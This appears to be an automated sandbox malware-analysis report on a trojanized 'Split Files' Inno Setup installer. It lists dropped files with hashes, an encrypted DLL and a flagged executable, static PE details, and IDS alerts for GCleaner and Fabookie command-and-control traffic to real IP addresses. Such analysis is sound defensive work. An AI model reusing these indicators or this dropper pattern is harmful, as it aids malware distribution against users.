                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl

                C:\Program Files (x86)\Split Files\language\is-T2GFQ.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou

                C:\Program Files (x86)\Split Files\unins000.dat

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:InnoSetup Log Split Files {215D64A9-0240-4952-9F4D-4D0A65391F2C}, version 0x2a, 4440 bytes, 760639\user, "C:\Program Files (x86)\Split Files"
                Category:dropped
                Size (bytes):4440
                Entropy (8bit):4.694474322424776
                Encrypted:false
                SSDEEP:48:kYm+aDkyMlLBv8rD85pPmUIrBdcoINLFhqkLVO3471hD5WpPLDfDxLDvvDHD1Doh:k6jZp8rD85pPmaoINFhqYOIhHeSk9Wh
                MD5:53C436BD0D2549BA1258A77A841B5A9A
                SHA1:5F7B0A6634430337111FA045E4F2E0128A8DB7CB
                SHA-256:A358BD2018A9F35635AF323C85172C5B9850FDCCC8F952C49D38D842328C3C86
                SHA-512:BD64AB964DAF92C20189970BB5C26813315BAA552473E65CC8386D83C7E0100519184CA276BE75E02381837E53ED726CF3B46BAB16CD22240B1641D2879846A9
                Malicious:false
                Preview:Inno Setup Uninstall Log (b)....................................{215D64A9-0240-4952-9F4D-4D0A65391F2C}}.........................................................................................Split Files.....................................................................................................................*.......X...%.................................................................................................................Da....s....F........B....760639.user"C:\Program Files (x86)\Split Files.................. ..........R.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMetr

                C:\Program Files (x86)\Split Files\unins000.exe (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

                C:\Program Files (x86)\Split Files\webpage.url (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\count[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\fuckingdllENCR[1].dll

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:data
                Category:dropped
                Size (bytes):94224
                Entropy (8bit):7.998072640845361
                Encrypted:true
                SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                MD5:418619EA97671304AF80EC60F5A50B62
                SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                Malicious:false
                Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\library[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\ping[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):17
                Entropy (8bit):3.1751231351134614
                Encrypted:false
                SSDEEP:3:nCmxEl:Cmc
                MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                Malicious:false
                Preview:UwUoooIIrwgh24uuU

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\library[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0

                C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):778752
                Entropy (8bit):6.357908612813808
                Encrypted:false
                SSDEEP:12288:cpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOG:2mt2bfrP437QzH/A6A7E7dVPUxOG
                MD5:E8176050192FBB976D70238E3C121F4C
                SHA1:2F1FD24EFE1F3F3FEE775CC3F5255B32F8880900
                SHA-256:AB4FE42A7B708DDB648BB2088216FF47B877AE599FD52FF50359FC1DB8E11EF7
                SHA-512:27EDF7A71C6546F1AB52E7EF97E404975DDD237D6C2D1038D24A49EAB724971884510F00F427C713ADB105857A0B12C7D57CA1CA1C70A6CEFED4BE619C345F4C
                Malicious:true
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_iscrypt.dll

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2560
                Entropy (8bit):2.8818118453929262
                Encrypted:false
                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                MD5:A69559718AB506675E907FE49DEB71E9
                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.226829458093667
                Encrypted:false
                SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):23312
                Entropy (8bit):4.596242908851566
                Encrypted:false
                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):6.20389308045717
                Encrypted:false
                SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                MD5:3FB36CB0B7172E5298D2992D42984D06
                SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                Entropy (8bit):7.9253810174103325
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.88%
                • Inno Setup installer (109748/4) 1.08%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1970815
                MD5:4206f8b371294f11b01592acc7bb338d
                SHA1:9383a82b185715c4b42b23ef730acb53f17dfcfb
                SHA256:5f5252d8963550284ca23188a6ee8a5b9aa85c3d1ce1f5983ee7dcc7e60f8b33
                SHA512:4396f5199bf5fb4fd62b3b4b652801161f5cc19dec17b0cc7ce0700e314f478dd06750a9c3fb53eb1d688f0bf0d5132331f8b821cfb75255d1e49c80609fca7b
                SSDEEP:24576:lpniVajDB1ubGd/qd5o37sEPfU2kCchDvfDBPNtbVWiY/Q6PmFNggJoHOVgcF93o:3ikj9k2k7TpNgPmFJN3T6t7gZ8UkqBi
                TLSH:17951235B09071EEF8F35AB0040F456C6A672F7369A8BE2E251AB3395932371F516F24
                File Content Preview:MZP.....................@.......................InnoW...................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                File Icon

                Icon Hash:b8ba6cc880e1f204

                Static PE Info

                General

                Entrypoint:0x409820
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:1
                OS Version Minor:0
                File Version Major:1
                File Version Minor:0
                Subsystem Version Major:1
                Subsystem Version Minor:0
                Import Hash:e92b45c54aa05ec107d5ef90662e6b33

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFD4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-10h], eax
                mov dword ptr [ebp-1Ch], eax
                call 00007F90A86E9FDBh
                call 00007F90A86EB286h
                call 00007F90A86ED489h
                call 00007F90A86ED4D0h
                call 00007F90A86EFAC7h
                call 00007F90A86EFC2Eh
                mov esi, 0040BDE0h
                xor eax, eax
                push ebp
                push 00409F05h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 00409EBBh
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [0040B014h]
                call 00007F90A86F061Fh
                call 00007F90A86F01DEh
                lea edx, dword ptr [ebp-10h]
                xor eax, eax
                call 00007F90A86ED944h
                mov edx, dword ptr [ebp-10h]
                mov eax, 0040BDD4h
                call 00007F90A86EA087h
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [0040BDD4h]
                mov dl, 01h
                mov eax, 00407158h
                call 00007F90A86EE02Bh
                mov dword ptr [0040BDD8h], eax
                xor edx, edx
                push ebp
                push 00409E99h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                lea edx, dword ptr [ebp-18h]
                mov eax, dword ptr [0040BDD8h]
                call 00007F90A86EE127h
                mov ebx, dword ptr [ebp-18h]
                mov edx, 00000030h
                mov eax, dword ptr [0040BDD8h]
                call 00007F90A86EE261h
                mov edx, esi
                mov ecx, 0000000Ch

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x8f0.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x1f558.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x0.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xe0000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                CODE0x10000x8f940x9000False0.6195203993055556data6.591638965772245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA0xa0000x2480x400False0.306640625data2.7093261929320986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS0xb0000xe640x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xc0000x8f00xa00False0.3953125data4.294209855544776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xd0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xe0000x180x200False0.052734375data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc0xf0000x8840x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc0x100000x1f5580x1f600False0.37483659113545814data4.9335056025106585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x1039c0x51f3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                RT_ICON0x155900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States
                RT_ICON0x25db80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States
                RT_ICON0x29fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                RT_ICON0x2c5880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States
                RT_ICON0x2d6300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States
                RT_ICON0x2dfb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States
                RT_STRING0x2e4200x2f2data
                RT_STRING0x2e7140x30cdata
                RT_STRING0x2ea200x2cedata
                RT_STRING0x2ecf00x68data
                RT_STRING0x2ed580xb4data
                RT_STRING0x2ee0c0xaedata
                RT_GROUP_ICON0x2eebc0x68dataEnglishUnited States
                RT_VERSION0x2ef240x3a8dataEnglishUnited States
                RT_MANIFEST0x2f2cc0x289XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                Imports

                DLLImport
                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                user32.dllMessageBoxA
                oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                comctl32.dllInitCommonControls
                advapi32.dllAdjustTokenPrivileges

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.445.139.105.17149696802041920 01/05/23-09:17:07.792702TCP2041920ET TROJAN GCleaner Downloader Activity M84969680192.168.2.445.139.105.171
                192.168.2.4107.182.129.23549697802852981 01/05/23-09:17:07.993654TCP2852981ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET)4969780192.168.2.4107.182.129.235
                107.182.129.235192.168.2.480496972852925 01/05/23-09:17:08.021859TCP2852925ETPRO TROJAN GCleaner Downloader - Payload Response8049697107.182.129.235192.168.2.4
                192.168.2.4107.182.129.23549697802852980 01/05/23-09:17:07.923264TCP2852980ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET)4969780192.168.2.4107.182.129.235

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 5, 2023 09:17:07.767301083 CET4969680192.168.2.445.139.105.171
                Jan 5, 2023 09:17:07.791863918 CET804969645.139.105.171192.168.2.4
                Jan 5, 2023 09:17:07.792061090 CET4969680192.168.2.445.139.105.171
                Jan 5, 2023 09:17:07.792701960 CET4969680192.168.2.445.139.105.171
                Jan 5, 2023 09:17:07.816838980 CET804969645.139.105.171192.168.2.4
                Jan 5, 2023 09:17:07.824846983 CET804969645.139.105.171192.168.2.4
                Jan 5, 2023 09:17:07.825201988 CET4969680192.168.2.445.139.105.171
                Jan 5, 2023 09:17:07.895375013 CET4969780192.168.2.4107.182.129.235
